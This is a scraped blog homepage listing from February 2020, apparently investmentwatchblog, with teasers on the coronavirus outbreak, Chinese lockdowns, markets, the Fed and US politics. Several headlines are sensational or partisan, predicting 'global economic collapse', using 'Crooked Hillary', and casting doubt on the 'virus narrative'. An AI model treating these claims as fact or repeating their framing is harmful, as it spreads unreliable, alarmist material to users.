</div><article id="post-975504" class="post-975504 post type-post status-publish format-standard sticky hentry category-featured-articles tag-alamos tag-contagious tag-coronavirus tag-highly tag-laboratory tag-national tag-novel" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/los-alamos-national-laboratorythe-novel-coronavirus-is-highly-contagious-and-more-infectious-than-initially-estimated/" rel="bookmark">Los Alamos National Laboratory&#8221;The Novel Coronavirus is Highly Contagious and More Infectious Than Initially Estimated&#8221;</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/los-alamos-national-laboratorythe-novel-coronavirus-is-highly-contagious-and-more-infectious-than-initially-estimated/" title="10:38 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T10:38:23+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Well the cats out of the bag as such. No denying it now! &#8220;The novel corona virus(2019nCoV)is a recently emerged human pathogen that has spread widely since January 2020.Initially, the &#8230; <a title="Los Alamos National Laboratory&#8221;The Novel Coronavirus is Highly Contagious and More Infectious Than Initially Estimated&#8221;" class="read-more" href="https://www.investmentwatchblog.com/los-alamos-national-laboratorythe-novel-coronavirus-is-highly-contagious-and-more-infectious-than-initially-estimated/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/alamos/" rel="tag">alamos</a>, <a href="https://www.investmentwatchblog.com/tag/contagious/" rel="tag">contagious</a>, <a href="https://www.investmentwatchblog.com/tag/coronavirus/" rel="tag">coronavirus</a>, <a href="https://www.investmentwatchblog.com/tag/highly/" rel="tag">highly</a>, <a href="https://www.investmentwatchblog.com/tag/laboratory/" rel="tag">laboratory</a>, <a href="https://www.investmentwatchblog.com/tag/national/" rel="tag">national</a>, <a href="https://www.investmentwatchblog.com/tag/novel/" rel="tag">novel</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975505" class="post-975505 post type-post status-publish format-standard sticky hentry category-featured-articles tag-blankets tag-china tag-control tag-million tag-social tag-style tag-virus" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/to-tame-virus-mao-style-social-control-blankets-china-760-million-people-face-restrictions-xi-urges-more-policing-web-crackdown/" rel="bookmark">To Tame Virus, Mao-Style Social Control Blankets China&#8230;   760 million people face restrictions&#8230; Xi urges more policing, web crackdown&#8230;</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/to-tame-virus-mao-style-social-control-blankets-china-760-million-people-face-restrictions-xi-urges-more-policing-web-crackdown/" title="10:36 am" rel="bookmark"><time class="updated" datetime="2020-02-16T10:39:15+00:00" itemprop="dateModified">February 16, 2020</time><time class="entry-date published" datetime="2020-02-16T10:36:14+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>To Tame Virus, Mao-Style Social Control Blankets China&#8230; 760 million people face restrictions&#8230;  SHANGHAI — China has flooded cities and villages with battalions of neighborhood busybodies, uniformed volunteers and Communist Party &#8230; <a title="To Tame Virus, Mao-Style Social Control Blankets China&#8230;   760 million people face restrictions&#8230; Xi urges more policing, web crackdown&#8230;" class="read-more" href="https://www.investmentwatchblog.com/to-tame-virus-mao-style-social-control-blankets-china-760-million-people-face-restrictions-xi-urges-more-policing-web-crackdown/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/blankets/" rel="tag">blankets</a>, <a href="https://www.investmentwatchblog.com/tag/china/" rel="tag">china</a>, <a href="https://www.investmentwatchblog.com/tag/control/" rel="tag">control</a>, <a href="https://www.investmentwatchblog.com/tag/million/" rel="tag">million</a>, <a href="https://www.investmentwatchblog.com/tag/social/" rel="tag">social</a>, <a href="https://www.investmentwatchblog.com/tag/style/" rel="tag">style</a>, <a href="https://www.investmentwatchblog.com/tag/virus/" rel="tag">virus</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<div class="inves-homepage-desktop-ad" id="inves-645277177"><script src='//ads.investingchannel.com/adtags/investmentwatchblog/economics/300x250.js' type='text/javascript' charset='utf-8'></script>  

</div><article id="post-975494" class="post-975494 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-belief tag-beyond tag-economic tag-michael tag-pento tag-rancid tag-upcoming" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/michael-pento-upcoming-economic-data-rancid-beyond-belief-maniac-money-printers-gone-mad-fighting-china-virus/" rel="bookmark">Michael Pento – Upcoming Economic Data Rancid Beyond Belief, Maniac Money Printers Gone Mad Fighting China Virus</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/michael-pento-upcoming-economic-data-rancid-beyond-belief-maniac-money-printers-gone-mad-fighting-china-virus/" title="12:14 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T00:14:43+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/michael-pento-upcoming-economic-data-rancid-beyond-belief-maniac-money-printers-gone-mad-fighting-china-virus/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-364.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-364.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-364-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>Money manager Michael Pento predicts, “The economic data for the next few weeks, at a minimum, is going to be rancid beyond belief. I would be very cautious in thinking &#8230; <a title="Michael Pento – Upcoming Economic Data Rancid Beyond Belief, Maniac Money Printers Gone Mad Fighting China Virus" class="read-more" href="https://www.investmentwatchblog.com/michael-pento-upcoming-economic-data-rancid-beyond-belief-maniac-money-printers-gone-mad-fighting-china-virus/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/belief/" rel="tag">belief</a>, <a href="https://www.investmentwatchblog.com/tag/beyond/" rel="tag">beyond</a>, <a href="https://www.investmentwatchblog.com/tag/economic/" rel="tag">economic</a>, <a href="https://www.investmentwatchblog.com/tag/michael/" rel="tag">michael</a>, <a href="https://www.investmentwatchblog.com/tag/pento/" rel="tag">pento</a>, <a href="https://www.investmentwatchblog.com/tag/rancid/" rel="tag">rancid</a>, <a href="https://www.investmentwatchblog.com/tag/upcoming/" rel="tag">upcoming</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975508" class="post-975508 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-collapse tag-economic tag-global tag-incoming tag-shipping tag-tankers tag-unload" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/global-economic-collapse-incoming-tons-of-shipping-tankers-at-sea-cant-unload-due-to-pandemic/" rel="bookmark">Global economic collapse incoming &#8211; Tons of shipping tankers at sea can&#8217;t unload due to pandemic</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/global-economic-collapse-incoming-tons-of-shipping-tankers-at-sea-cant-unload-due-to-pandemic/" title="12:12 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T00:12:34+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/global-economic-collapse-incoming-tons-of-shipping-tankers-at-sea-cant-unload-due-to-pandemic/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/2020-02-15_10-35-48-400x400.png" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/2020-02-15_10-35-48-400x400.png 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/2020-02-15_10-35-48-150x150.png 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>This will soon lead to a global collapse Tankers&#8230; tankers everywhere#Singapore This is normal, as Singapore is a major freight hub and one of the busiest ports in the world &#8230; <a title="Global economic collapse incoming &#8211; Tons of shipping tankers at sea can&#8217;t unload due to pandemic" class="read-more" href="https://www.investmentwatchblog.com/global-economic-collapse-incoming-tons-of-shipping-tankers-at-sea-cant-unload-due-to-pandemic/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/collapse/" rel="tag">collapse</a>, <a href="https://www.investmentwatchblog.com/tag/economic/" rel="tag">economic</a>, <a href="https://www.investmentwatchblog.com/tag/global/" rel="tag">global</a>, <a href="https://www.investmentwatchblog.com/tag/incoming/" rel="tag">incoming</a>, <a href="https://www.investmentwatchblog.com/tag/shipping/" rel="tag">shipping</a>, <a href="https://www.investmentwatchblog.com/tag/tankers/" rel="tag">tankers</a>, <a href="https://www.investmentwatchblog.com/tag/unload/" rel="tag">unload</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<div class="inves-homepage" style="text-align: center; " id="inves-831723757"><div class='mailmunch-forms-widget-698793'></div>

<META HTTP-EQUIV="refresh" CONTENT="600">
</div><article id="post-975347" class="post-975347 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-faster tag-federal tag-monetizing tag-previous tag-reserve tag-tightening" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/federal-reserve-monetizing-us-debt-faster-than-its-previous-tightening/" rel="bookmark">Federal Reserve Monetizing US Debt Faster than its Previous Tightening</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/federal-reserve-monetizing-us-debt-faster-than-its-previous-tightening/" title="12:20 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-15T12:20:00+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/federal-reserve-monetizing-us-debt-faster-than-its-previous-tightening/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/rev-repo-2.11-400x400.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/rev-repo-2.11-400x400.jpg 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/rev-repo-2.11-150x150.jpg 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by David Haggith During its brief and utterly failed attempt to reduce its balance sheet (called quantitative tightening), the Federal Reserve only rolled off securities at a rate of $50 billion &#8230; <a title="Federal Reserve Monetizing US Debt Faster than its Previous Tightening" class="read-more" href="https://www.investmentwatchblog.com/federal-reserve-monetizing-us-debt-faster-than-its-previous-tightening/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/faster/" rel="tag">faster</a>, <a href="https://www.investmentwatchblog.com/tag/federal/" rel="tag">federal</a>, <a href="https://www.investmentwatchblog.com/tag/monetizing/" rel="tag">monetizing</a>, <a href="https://www.investmentwatchblog.com/tag/previous/" rel="tag">previous</a>, <a href="https://www.investmentwatchblog.com/tag/reserve/" rel="tag">reserve</a>, <a href="https://www.investmentwatchblog.com/tag/tightening/" rel="tag">tightening</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975323" class="post-975323 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-bloomberg tag-clinton tag-considering tag-crooked tag-hillary tag-picking tag-running" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/mini-mike-bloomberg-considering-picking-crooked-hillary-clinton-as-his-running-mate-in-desperate-attempt-to-rally-demoralized-democratic-party/" rel="bookmark">‘Mini Mike’ Bloomberg Considering Picking Crooked Hillary Clinton As His Running Mate In Desperate Attempt To Rally Demoralized Democratic Party</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/mini-mike-bloomberg-considering-picking-crooked-hillary-clinton-as-his-running-mate-in-desperate-attempt-to-rally-demoralized-democratic-party/" title="12:17 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-15T12:17:43+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/mini-mike-bloomberg-considering-picking-crooked-hillary-clinton-as-his-running-mate-in-desperate-attempt-to-rally-demoralized-democratic-party/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/mini-mike-crooked-hillary-clinton-2020-400x400.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/mini-mike-crooked-hillary-clinton-2020-400x400.jpg 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/mini-mike-crooked-hillary-clinton-2020-150x150.jpg 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by Geoffrey Grider Mini Mike Bloomberg is considering Crooked Hillary Clinton as a running mate, according to a Drudge Report breaking news exclusive report. In a desperate attempt to create excitement &#8230; <a title="‘Mini Mike’ Bloomberg Considering Picking Crooked Hillary Clinton As His Running Mate In Desperate Attempt To Rally Demoralized Democratic Party" class="read-more" href="https://www.investmentwatchblog.com/mini-mike-bloomberg-considering-picking-crooked-hillary-clinton-as-his-running-mate-in-desperate-attempt-to-rally-demoralized-democratic-party/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/bloomberg/" rel="tag">bloomberg</a>, <a href="https://www.investmentwatchblog.com/tag/clinton/" rel="tag">clinton</a>, <a href="https://www.investmentwatchblog.com/tag/considering/" rel="tag">considering</a>, <a href="https://www.investmentwatchblog.com/tag/crooked/" rel="tag">crooked</a>, <a href="https://www.investmentwatchblog.com/tag/hillary/" rel="tag">hillary</a>, <a href="https://www.investmentwatchblog.com/tag/picking/" rel="tag">picking</a>, <a href="https://www.investmentwatchblog.com/tag/running/" rel="tag">running</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975322" class="post-975322 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-bonds tag-craziest tag-flowing tag-guggenheim tag-money tag-record tag-warns" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/record-money-flowing-into-bonds-guggenheim-warns-craziest-market-in-history/" rel="bookmark">RECORD Money Flowing Into Bonds! Guggenheim Warns Craziest Market In History!</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/record-money-flowing-into-bonds-guggenheim-warns-craziest-market-in-history/" title="12:14 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-15T12:14:55+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/record-money-flowing-into-bonds-guggenheim-warns-craziest-market-in-history/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-352.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-352.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-352-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>Even the billion dollar funds are saying something isn&#8217;t right. They&#8217;re not selling everything. They&#8217;re not hiding in their bunkers. They&#8217;re just saying this market is out of control and &#8230; <a title="RECORD Money Flowing Into Bonds! Guggenheim Warns Craziest Market In History!" class="read-more" href="https://www.investmentwatchblog.com/record-money-flowing-into-bonds-guggenheim-warns-craziest-market-in-history/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/bonds/" rel="tag">bonds</a>, <a href="https://www.investmentwatchblog.com/tag/craziest/" rel="tag">craziest</a>, <a href="https://www.investmentwatchblog.com/tag/flowing/" rel="tag">flowing</a>, <a href="https://www.investmentwatchblog.com/tag/guggenheim/" rel="tag">guggenheim</a>, <a href="https://www.investmentwatchblog.com/tag/money/" rel="tag">money</a>, <a href="https://www.investmentwatchblog.com/tag/record/" rel="tag">record</a>, <a href="https://www.investmentwatchblog.com/tag/warns/" rel="tag">warns</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975320" class="post-975320 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-believe tag-destroying tag-doesn tag-really tag-sense tag-shipment tag-virus" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/ccp-destroying-food-shipment-doesnt-really-make-sense-if-you-believe-the-virus-narrative/" rel="bookmark">CCP destroying food shipment&#8230; doesn&#8217;t really make sense if you believe the virus narrative.</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/ccp-destroying-food-shipment-doesnt-really-make-sense-if-you-believe-the-virus-narrative/" title="12:11 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-15T12:11:13+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/ccp-destroying-food-shipment-doesnt-really-make-sense-if-you-believe-the-virus-narrative/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-350.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-350.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-350-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>Supplemental videos on-topic: &#8230;and here are some helpful neighbors hoisting food up to people that are presumably locked in their homes: For #Wuhan citizens, do you know how they receive &#8230; <a title="CCP destroying food shipment&#8230; doesn&#8217;t really make sense if you believe the virus narrative." class="read-more" href="https://www.investmentwatchblog.com/ccp-destroying-food-shipment-doesnt-really-make-sense-if-you-believe-the-virus-narrative/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/believe/" rel="tag">believe</a>, <a href="https://www.investmentwatchblog.com/tag/destroying/" rel="tag">destroying</a>, <a href="https://www.investmentwatchblog.com/tag/doesn/" rel="tag">doesn</a>, <a href="https://www.investmentwatchblog.com/tag/really/" rel="tag">really</a>, <a href="https://www.investmentwatchblog.com/tag/sense/" rel="tag">sense</a>, <a href="https://www.investmentwatchblog.com/tag/shipment/" rel="tag">shipment</a>, <a href="https://www.investmentwatchblog.com/tag/virus/" rel="tag">virus</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975367" class="post-975367 post type-post status-publish format-standard sticky hentry category-featured-articles tag-china tag-disinfects tag-notes tag-quarantines" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/china-disinfects-bank-notes-and-quarantines-them-for-14-days/" rel="bookmark">China disinfects BANK NOTES and quarantines them for 14 days!</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/china-disinfects-bank-notes-and-quarantines-them-for-14-days/" title="11:45 am" rel="bookmark"><time class="updated" datetime="2020-02-15T11:45:35+00:00" itemprop="dateModified">February 15, 2020</time><time class="entry-date published" datetime="2020-02-15T11:45:01+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Chinese banks use ultraviolet light then seal and store the cash for up to 14 days  The banks have been urged to provide new banknotes to customers if possible  Central &#8230; <a title="China disinfects BANK NOTES and quarantines them for 14 days!" class="read-more" href="https://www.investmentwatchblog.com/china-disinfects-bank-notes-and-quarantines-them-for-14-days/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/china/" rel="tag">china</a>, <a href="https://www.investmentwatchblog.com/tag/disinfects/" rel="tag">disinfects</a>, <a href="https://www.investmentwatchblog.com/tag/notes/" rel="tag">notes</a>, <a href="https://www.investmentwatchblog.com/tag/quarantines/" rel="tag">quarantines</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975318" class="post-975318 post type-post status-publish format-standard has-post-thumbnail sticky hentry category-featured-articles tag-february tag-known tag-month tag-reelected tag-trump" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/why-february-2020-will-be-known-as-the-month-when-trump-was-reelected/" rel="bookmark">Why February 2020 will be known as the month when Trump was reelected</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/why-february-2020-will-be-known-as-the-month-when-trump-was-reelected/" title="11:43 am" rel="bookmark"><time class="updated" datetime="2020-02-15T11:43:36+00:00" itemprop="dateModified">February 15, 2020</time><time class="entry-date published" datetime="2020-02-15T11:43:30+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/why-february-2020-will-be-known-as-the-month-when-trump-was-reelected/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-347.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-347.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-347-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by scooterdog Tammy Bruce (Washington Times columnist) wrote this piece (found on Fox News) that I&#8217;ll put in chronological order and add a few links and other items for good &#8230; <a title="Why February 2020 will be known as the month when Trump was reelected" class="read-more" href="https://www.investmentwatchblog.com/why-february-2020-will-be-known-as-the-month-when-trump-was-reelected/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/february/" rel="tag">february</a>, <a href="https://www.investmentwatchblog.com/tag/known/" rel="tag">known</a>, <a href="https://www.investmentwatchblog.com/tag/month/" rel="tag">month</a>, <a href="https://www.investmentwatchblog.com/tag/reelected/" rel="tag">reelected</a>, <a href="https://www.investmentwatchblog.com/tag/trump/" rel="tag">trump</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975211" class="post-975211 post type-post status-publish format-standard sticky hentry category-featured-articles tag-armies tag-devouring tag-entire tag-exodus tag-farms tag-locust tag-something" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/like-something-out-of-the-book-of-exodus-locust-armies-are-devouring-entire-farms-in-kenya-in-as-little-as-30-seconds/" rel="bookmark">“Like Something Out Of The Book Of Exodus”: Locust Armies Are Devouring Entire Farms In Kenya “In As Little As 30 Seconds”</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/like-something-out-of-the-book-of-exodus-locust-armies-are-devouring-entire-farms-in-kenya-in-as-little-as-30-seconds/" title="8:34 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-15T08:34:35+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>by Michael Snyder Locust armies numbering in the billions are absolutely ravaging large portions of eastern Africa and vast stretches of the Middle East.  We are being told that these &#8230; <a title="“Like Something Out Of The Book Of Exodus”: Locust Armies Are Devouring Entire Farms In Kenya “In As Little As 30 Seconds”" class="read-more" href="https://www.investmentwatchblog.com/like-something-out-of-the-book-of-exodus-locust-armies-are-devouring-entire-farms-in-kenya-in-as-little-as-30-seconds/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/armies/" rel="tag">armies</a>, <a href="https://www.investmentwatchblog.com/tag/devouring/" rel="tag">devouring</a>, <a href="https://www.investmentwatchblog.com/tag/entire/" rel="tag">entire</a>, <a href="https://www.investmentwatchblog.com/tag/exodus/" rel="tag">exodus</a>, <a href="https://www.investmentwatchblog.com/tag/farms/" rel="tag">farms</a>, <a href="https://www.investmentwatchblog.com/tag/locust/" rel="tag">locust</a>, <a href="https://www.investmentwatchblog.com/tag/something/" rel="tag">something</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975297" class="post-975297 post type-post status-publish format-standard sticky hentry category-featured-articles tag-control tag-energy tag-incredibly tag-market tag-speculative" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/speculative-energy-in-the-market-is-incredibly-out-of-control/" rel="bookmark">“Speculative Energy in the Market is Incredibly out of Control”</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/speculative-energy-in-the-market-is-incredibly-out-of-control/" title="8:32 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-15T08:32:59+00:00" itemprop="datePublished">February 15, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>“It is a mind-numbing exercise for investors who see the cognitive dissonance”: CIO at Guggenheim Partners. By Wolf Richter for WOLF STREET. This market has been an astounding experience for people who’ve traded &#8230; <a title="“Speculative Energy in the Market is Incredibly out of Control”" class="read-more" href="https://www.investmentwatchblog.com/speculative-energy-in-the-market-is-incredibly-out-of-control/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/control/" rel="tag">control</a>, <a href="https://www.investmentwatchblog.com/tag/energy/" rel="tag">energy</a>, <a href="https://www.investmentwatchblog.com/tag/incredibly/" rel="tag">incredibly</a>, <a href="https://www.investmentwatchblog.com/tag/market/" rel="tag">market</a>, <a href="https://www.investmentwatchblog.com/tag/speculative/" rel="tag">speculative</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975516" class="post-975516 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-banking tag-fatal tag-interest tag-negative tag-rates tag-system tag-ultimately" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/negative-interest-rates-are-fatal-ultimately-to-your-banking-system-jeff-gundlach/" rel="bookmark">&#8220;Negative interest rates are fatal, ultimately, to your banking system.&#8221; &#8211; Jeff Gundlach</a></h2>			<div class="entry-meta">
